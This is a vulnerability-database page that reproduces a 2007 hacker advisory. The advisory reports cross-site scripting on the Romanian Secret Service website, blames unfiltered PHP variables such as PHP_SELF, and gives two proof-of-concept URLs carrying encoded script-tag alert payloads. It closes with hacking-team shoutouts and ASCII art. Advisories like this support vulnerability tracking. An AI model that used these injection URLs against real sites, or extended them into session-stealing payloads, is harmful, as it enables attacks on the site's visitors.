Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

sriweb-xss.txt

🗓️ 23 May 2007 00:00:00Reported by fl0 fl0wType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

The Romanian Secret Service web site suffers from cross site scripting vulnerability. XSS variant found in PHP script using unfiltered variables like PHP_SELF, REQUEST_URI, SCRIPT_URL, and SCRIPT_URI

Code
`####################################################################################  
~```````` XSS found by fl0 fl0w in sri.ro ``````~   
###############################################  
Description: The Romanian Secret Service web site suffers from cross site scripting vulnerability.  
Author: fl0 fl0w  
Homepage: http://popesculescu.lx.ro   
File Size: 5,13 KB  
  
  
site 'search' variable XSS  
Cross Site Scripting in URI  
Desciption :  
This XSS variant usually appears when a PHP script is using one of following variables without filtering them:   
*PHP_SELF   
*REQUEST_URI   
*SCRIPT_URL   
*SCRIPT_URI   
##########################Proof of concept#############################  
http://sri.ro/cauta.php/%3E%22%3E%3CScRiPt%3Ealert(710%20)%3C/ScRiPt%3E  
  
This vulnerability affects /index.php  
  
http://sri.ro/index.php?nav=ani&lang=--%3E%3CScRiPt%20%0a%0d%3Ealert(710)%3B%3C/ScRiPt%3E  
  
#############  
Timeline  
#############  
discovered: 18-05-2007  
  
Find me on http://hacking.carcabot.ro --the best hacking team in RO  
  
Sh0utz : OSHO,Vladiii ,CarcaBot, Ultimatum , Virtual_x ,Canvasa ,all RENSLT memberz.  
  
fl0 fl0w 2oo7 ©   
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmNNdmNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmmMMMNmh+mh/dmmmyhhdNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmhhdhyhNMMMMmhmddddmhdmyyyydhhdmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmdhyhhhmNNNNMMMMMMMMMMMMMMMNmmNmddhhdsmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMmhhhyhdmmNNMMMMMMNNNNmMNNNNNNMMMMMMNNNmhyosddNMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMNNdyhyhdNNMMMMMNmhyhdddhymdhdddhhhdmNNMMNNNmhdsymNMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMNmhhhshdmNNNNNdyhdhdmmNNMNNddmMMNNmmdddhddmMMMMNdmMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMNNNNmhoyhydmmmmmhhhyhmmNMMMMMMMMmdNMMMMMMMMNmdhyhdmNNNNmmNdydmNMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMNNNmhyyhs+/sshhooyhdmmmmNNNMMMMMMddNMMMMMNNNNNmmmhsoyhdy+ohyydhdNNMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMNNNmh+oss:ssyso+oyyhhdddmmmNNNNMMMddNMNNNNNmmmdddhhhyoooshhsyyysohmNMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMNNdooyyo:ossssooosssyyhhdddmmNNNNMdhNNNNmmmddhhhyyysssssyyyhossshyhmMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMNNdhyyso/+soo++/://+oossyyhhddmmNNNhhNNmmdddhyyysso++/:/++ssyysossosdmNMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMNmyoyss:ooo+/::...-::/+oosyyhhdmmmNhhmmmmdhhyssoo+/:-..-//+ossyooossshNMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMNdosoo:/o+//:-.````..-:/+oosyhhdmmmmmmmddhyyso+/:-.` ``.--//oossoyyoosmMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMNNy++oo/oo+/:-`` ``..-/+osyhhddmmmmddhyyso/:-.` `.::+osyyosoosdNMMMMMMMMMMMMM  
MMMMMMMMMMMMMMNmysso/oso+/:-` ``.:/+oyhddmmdddhyso/:.` `.-:/osyy+ohhyhmMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMdoo+o:syoo+:-``` ``.-:+syhddddhys+:.` ``.-::+syyhs+ydyhmNMMMMMMMMMMMM  
MMMMMMMMMMMMMMMdooso:yysso//--...````....--::/+yyhddhhyo+/:---.......--::/+oyhhhy+yyyydNMMMMMMMMMMMM  
MMMMMMMMMMMMMMMmysys/syyyso+++/::::::://++ossyyhhddhhhhyysso++///::://+++osshhhho+yhhdmNMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMNNmdyoosyyyssoo++++++++oossyyhhdddohddddhyyssooo++++ooossyyhyyssshmNNMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMNNNmsyhhdhhyyysssooosssyyhhhddmmd.sdmmddhhyyysssssssyyyhhddddhhdmNMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMNNNmmmmmddhhhhyyyyyyyyhhdddmmmm/.yhdmmddddhhyyyyhhhhdddmmmmmmdNNMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMNNdhhdddddhhso/:ohdmmmmmmd.ydhdmmmmmmds//+oyhddmmmmdhdmMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMNmmhsys+++/::+yhdmNNNNmoymdyhmNNNNNh+-/ooso+ssssddNNMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMNmhyydmdhhhddmmMMMNhhNNMmdmNMMMdooydmNmmdhhdmNMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmhhNNMMMMNMMMMMMNNMMMmshmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNhhNNMMMMMMMMMMMMMMMMNyymmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhhNMMMMMMMMMMMMMMMMMMdydNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhdmMMMMMMMMMMMMMMMMMMNhhNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdymNMMMMMMMMMMMMMMMMMMMysmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhsmMMMMMMMMMmmMMMMMMMMMysmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNysNMMNmMMMMM+hMMMMNmNMMdsdMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNyyNMMmyNMMMM:dMMMMmymMMmyhMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmydMMMmyMMMMM/dMMMMmymMMMddNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdhmMMMmhMMMMM+dMMMMNhmMMMmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhmMMMmhMMMMMsdMMMMMhmMMMMmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmdNMMMmdMMMMMydMMMMMdmMMMMmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNMMMMmdMMMMMydMMMMMmNMMMMNmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmdMMMMMydMMMMMNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNMMMMMhdMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4
php scriptcross site scriptingphp_selfrequest_uriscript_urlscript_uriurixss variantvulnerabilityproof of conceptromanian secret servicefl0 fl0whacking teamtimeline
20